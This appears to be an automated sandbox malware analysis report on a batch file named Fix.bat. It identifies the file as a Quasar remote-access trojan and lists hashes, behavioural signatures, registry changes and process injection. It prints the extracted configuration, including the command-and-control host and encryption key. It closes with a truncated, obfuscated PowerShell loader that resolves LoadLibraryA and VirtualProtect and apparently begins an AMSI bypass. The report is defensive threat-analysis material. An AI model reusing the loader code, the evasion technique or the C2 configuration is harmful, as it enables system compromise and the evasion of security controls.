Analysis
-
max time kernel
300s -
max time network
281s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-05-2024 21:43
Static task
static1
Behavioral task
behavioral1
Sample
Fix.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Fix.bat
Resource
win10v2004-20240508-en
General
-
Target
Fix.bat
-
Size
513KB
-
MD5
a84be587721ab2558489178539f283e6
-
SHA1
5a48f5c98f7366d13f371965c19c98a5754bd90b
-
SHA256
32cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
-
SHA512
c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
SSDEEP
12288:PlknMJu9SVaydjmxZ8yeMfd0dwOk6VWX0sQFjh80wszzd0VmONTlomwcuz:q6uidS6MdIdVWksQFjS0bzzOY+oX5z
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-AidubAN29rBfWYM23w
-
encryption_key
GNF1G2eu7MrbS69M7a4f
-
install_name
Client.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/3720-75-0x0000000007AC0000-0x0000000007B2C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1876 created 648 1876 powershell.EXE winlogon.exe PID 5068 created 648 5068 powershell.EXE winlogon.exe -
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 2 3720 powershell.exe 5 3720 powershell.exe 6 3720 powershell.exe 7 3720 powershell.exe 8 3720 powershell.exe 9 3720 powershell.exe 10 3720 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 4496 powershell.exe 1264 powershell.exe 3720 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
install.exeinstall.exepid process 4860 install.exe 5012 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com 4 api.ipify.org -
Drops file in System32 directory 15 IoCs
Processes:
OfficeClickToRun.exesvchost.exepowershell.EXEsvchost.exepowershell.EXEsvchost.exeDllHost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk DllHost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1876 set thread context of 3564 1876 powershell.EXE dllhost.exe PID 5068 set thread context of 1168 5068 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
OfficeClickToRun.exepowershell.EXEpowershell.EXEsvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715723134" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepid process 4496 powershell.exe 4496 powershell.exe 1264 powershell.exe 1264 powershell.exe 3720 powershell.exe 3720 powershell.exe 1876 powershell.EXE 1876 powershell.EXE 1876 powershell.EXE 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3720 powershell.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3720 powershell.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3720 powershell.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe 3564 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4496 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeIncreaseQuotaPrivilege 1264 powershell.exe Token: SeSecurityPrivilege 1264 powershell.exe Token: SeTakeOwnershipPrivilege 1264 powershell.exe Token: SeLoadDriverPrivilege 1264 powershell.exe Token: SeSystemProfilePrivilege 1264 powershell.exe Token: SeSystemtimePrivilege 1264 powershell.exe Token: SeProfSingleProcessPrivilege 1264 powershell.exe Token: SeIncBasePriorityPrivilege 1264 powershell.exe Token: SeCreatePagefilePrivilege 1264 powershell.exe Token: SeBackupPrivilege 1264 powershell.exe Token: SeRestorePrivilege 1264 powershell.exe Token: SeShutdownPrivilege 1264 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeSystemEnvironmentPrivilege 1264 powershell.exe Token: SeRemoteShutdownPrivilege 1264 powershell.exe Token: SeUndockPrivilege 1264 powershell.exe Token: SeManageVolumePrivilege 1264 powershell.exe Token: 33 1264 powershell.exe Token: 34 1264 powershell.exe Token: 35 1264 powershell.exe Token: 36 1264 powershell.exe Token: SeIncreaseQuotaPrivilege 1264 powershell.exe Token: SeSecurityPrivilege 1264 powershell.exe Token: SeTakeOwnershipPrivilege 1264 powershell.exe Token: SeLoadDriverPrivilege 1264 powershell.exe Token: SeSystemProfilePrivilege 1264 powershell.exe Token: SeSystemtimePrivilege 1264 powershell.exe Token: SeProfSingleProcessPrivilege 1264 powershell.exe Token: SeIncBasePriorityPrivilege 1264 powershell.exe Token: SeCreatePagefilePrivilege 1264 powershell.exe Token: SeBackupPrivilege 1264 powershell.exe Token: SeRestorePrivilege 1264 powershell.exe Token: SeShutdownPrivilege 1264 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeSystemEnvironmentPrivilege 1264 powershell.exe Token: SeRemoteShutdownPrivilege 1264 powershell.exe Token: SeUndockPrivilege 1264 powershell.exe Token: SeManageVolumePrivilege 1264 powershell.exe Token: 33 1264 powershell.exe Token: 34 1264 powershell.exe Token: 35 1264 powershell.exe Token: 36 1264 powershell.exe Token: SeIncreaseQuotaPrivilege 1264 powershell.exe Token: SeSecurityPrivilege 1264 powershell.exe Token: SeTakeOwnershipPrivilege 1264 powershell.exe Token: SeLoadDriverPrivilege 1264 powershell.exe Token: SeSystemProfilePrivilege 1264 powershell.exe Token: SeSystemtimePrivilege 1264 powershell.exe Token: SeProfSingleProcessPrivilege 1264 powershell.exe Token: SeIncBasePriorityPrivilege 1264 powershell.exe Token: SeCreatePagefilePrivilege 1264 powershell.exe Token: SeBackupPrivilege 1264 powershell.exe Token: SeRestorePrivilege 1264 powershell.exe Token: SeShutdownPrivilege 1264 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeSystemEnvironmentPrivilege 1264 powershell.exe Token: SeRemoteShutdownPrivilege 1264 powershell.exe Token: SeUndockPrivilege 1264 powershell.exe Token: SeManageVolumePrivilege 1264 powershell.exe Token: 33 1264 powershell.exe Token: 34 1264 powershell.exe Token: 35 1264 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 3720 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 1280 wrote to memory of 4496 1280 cmd.exe powershell.exe PID 1280 wrote to memory of 4496 1280 cmd.exe powershell.exe PID 1280 wrote to memory of 4496 1280 cmd.exe powershell.exe PID 4496 wrote to memory of 1264 4496 powershell.exe powershell.exe PID 4496 wrote to memory of 1264 4496 powershell.exe powershell.exe PID 4496 wrote to memory of 1264 4496 powershell.exe powershell.exe PID 4496 wrote to memory of 5116 4496 powershell.exe WScript.exe PID 4496 wrote to memory of 5116 4496 powershell.exe WScript.exe PID 4496 wrote to memory of 5116 4496 powershell.exe WScript.exe PID 5116 wrote to memory of 3156 5116 WScript.exe cmd.exe PID 5116 wrote to memory of 3156 5116 WScript.exe cmd.exe PID 5116 wrote to memory of 3156 5116 WScript.exe cmd.exe PID 3156 wrote to memory of 3720 3156 cmd.exe powershell.exe PID 3156 wrote to memory of 3720 3156 cmd.exe powershell.exe PID 3156 wrote to memory of 3720 3156 cmd.exe powershell.exe PID 3720 wrote to memory of 4860 3720 powershell.exe install.exe PID 3720 wrote to memory of 4860 3720 powershell.exe install.exe PID 3720 wrote to memory of 4860 3720 powershell.exe install.exe PID 1876 wrote to memory of 3564 1876 powershell.EXE dllhost.exe PID 1876 wrote to memory of 3564 1876 powershell.EXE dllhost.exe PID 1876 wrote to memory of 3564 1876 powershell.EXE dllhost.exe PID 1876 wrote to memory of 3564 1876 powershell.EXE dllhost.exe PID 1876 wrote to memory of 3564 1876 powershell.EXE dllhost.exe PID 1876 wrote to memory of 3564 1876 powershell.EXE dllhost.exe PID 1876 wrote to memory of 3564 1876 powershell.EXE dllhost.exe PID 1876 wrote to memory of 3564 1876 powershell.EXE dllhost.exe PID 3564 wrote to memory of 648 3564 dllhost.exe winlogon.exe PID 3564 wrote to memory of 704 3564 dllhost.exe lsass.exe PID 3564 wrote to memory of 996 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 548 3564 dllhost.exe dwm.exe PID 3564 wrote to memory of 772 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 740 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1072 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1092 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1136 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1196 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1244 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1320 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1408 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1476 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1520 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1628 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1648 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1672 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1736 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1764 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1864 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1884 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1952 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1960 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 1152 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 2068 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 2128 3564 dllhost.exe spoolsv.exe PID 3564 wrote to memory of 2276 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 2348 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 2472 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 2480 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 2524 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 2576 3564 dllhost.exe sysmon.exe PID 3564 wrote to memory of 2584 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 2596 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 2684 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 2704 3564 dllhost.exe svchost.exe PID 3564 wrote to memory of 2772 3564 dllhost.exe sihost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7dcccc0d-d4f6-4a3a-93d0-ba0a8a12dbb4}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f56ec715-b702-4eea-b848-10c1df4d903f}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:wOGAyguphIJy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zDrOzdIcDevpRr,[Parameter(Position=1)][Type]$NSFqPkvNoU)$NtYlyEhdOMS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+'M'+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+'P'+'ub'+[Char](108)+''+'i'+''+'c'+''+','+'S'+[Char](101)+'a'+[Char](108)+''+'e'+''+[Char](100)+','+'A'+''+[Char](110)+''+[Char](115)+'i'+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+''+','+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$NtYlyEhdOMS.DefineConstructor(''+[Char](82)+'T'+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+'id'+[Char](101)+''+[Char](66)+'ySi'+'g'+','+[Char](80)+''+'u'+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$zDrOzdIcDevpRr).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+'M'+''+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');$NtYlyEhdOMS.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bl'+'i'+''+[Char](99)+''+','+''+'H'+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+''+[Char](44)+'N'+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+'t'+','+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'al',$NSFqPkvNoU,$zDrOzdIcDevpRr).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+''+'g'+'e'+[Char](100)+'');Write-Output $NtYlyEhdOMS.CreateType();}$hmbOfFVupfNNg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+'i'+'cro'+'s'+'o'+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$SVcqGmjufytRJA=$hmbOfFVupfNNg.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+'l'+''+'i'+''+'c'+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WIYAzyMPhvyKvMspjxB=wOGAyguphIJy @([String])([IntPtr]);$ZLfVfGLNMgrAYWovZKdjgd=wOGAyguphIJy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nlFxdJnAiXW=$hmbOfFVupfNNg.GetMethod(''+'G'+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+'H'+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+'e'+'l'+''+[Char](51)+'2'+'.'+'dl'+[Char](108)+'')));$GrEUoFfbchCjKi=$SVcqGmjufytRJA.Invoke($Null,@([Object]$nlFxdJnAiXW,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+'a'+''+[Char](114)+'y'+[Char](65)+'')));$nWusEhMvsRBzqbuvu=$SVcqGmjufytRJA.Invoke($Null,@([Object]$nlFxdJnAiXW,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+[Char](117)+''+[Char](97)+'lP'+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$mMvgGbv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GrEUoFfbchCjKi,$WIYAzyMPhvyKvMspjxB).Invoke(''+[Char](97)+'msi'+[C